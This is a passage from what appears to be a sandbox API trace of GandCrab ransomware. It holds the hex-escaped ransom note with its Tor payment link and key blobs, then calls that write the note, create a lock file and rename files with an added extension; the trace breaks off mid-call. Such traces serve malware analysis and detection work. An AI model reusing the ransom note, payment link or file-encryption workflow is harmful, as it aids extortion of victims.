72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.520] WriteFile (in: hFile=0x218, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259fa30, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259fa30*=0x2162, lpOverlapped=0x0) returned 1 [0067.521] CloseHandle (hObject=0x218) returned 1 [0067.521] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.521] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.521] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x344)) [0067.522] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.522] GetWindowsDirectoryW (in: lpBuffer=0x2610000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.522] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2610200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2610600, lpMaximumComponentLength=0x2610608, lpFileSystemFlags=0x2610604, lpFileSystemNameBuffer=0x2610400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2610600*=0xd2ca4def, lpMaximumComponentLength=0x2610608*=0xff, lpFileSystemFlags=0x2610604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.522] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\PerfLogs\\d2ca4a09d2ca4deb61a.lock") returned 36 [0067.522] CreateFileW (lpFileName="C:\\PerfLogs\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\perflogs\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x218 [0067.523] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.523] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.523] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0067.523] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*" | out: lpString1="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0067.523] FindFirstFileExW (in: lpFileName="C:\\PerfLogs\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0x4c9c78 [0067.523] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.523] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.523] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.523] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.523] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.523] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.523] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.523] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\PerfLogs\\d2ca4a09d2ca4deb61a.lock") returned="C:\\PerfLogs\\d2ca4a09d2ca4deb61a.lock" [0067.523] lstrlenW (lpString=".titwmvjl") returned 9 [0067.523] lstrlenW (lpString="C:\\PerfLogs\\d2ca4a09d2ca4deb61a.lock") returned 36 [0067.523] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.524] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\PerfLogs\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 45 [0067.524] lstrlenW (lpString="C:\\PerfLogs\\d2ca4a09d2ca4deb61a.lock") returned 36 [0067.524] lstrlenW (lpString=".lock") returned 5 [0067.524] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.524] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.524] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.524] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.524] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.524] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0067.524] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0067.524] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\PerfLogs\\TITWMVJL-DECRYPT.txt") returned="C:\\PerfLogs\\TITWMVJL-DECRYPT.txt" [0067.524] lstrlenW (lpString=".titwmvjl") returned 9 [0067.524] lstrlenW (lpString="C:\\PerfLogs\\TITWMVJL-DECRYPT.txt") returned 32 [0067.524] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.525] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\PerfLogs\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 41 [0067.525] lstrlenW (lpString="C:\\PerfLogs\\TITWMVJL-DECRYPT.txt") returned 32 [0067.525] lstrlenW (lpString=".txt") returned 4 [0067.525] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.525] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".txt ") returned 5 [0067.525] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0067.525] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.525] lstrlenW (lpString="C:\\PerfLogs\\TITWMVJL-DECRYPT.txt") returned 32 [0067.525] lstrlenW (lpString="C:\\PerfLogs\\TITWMVJL-DECRYPT.txt") returned 32 [0067.525] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0067.525] lstrcmpiW 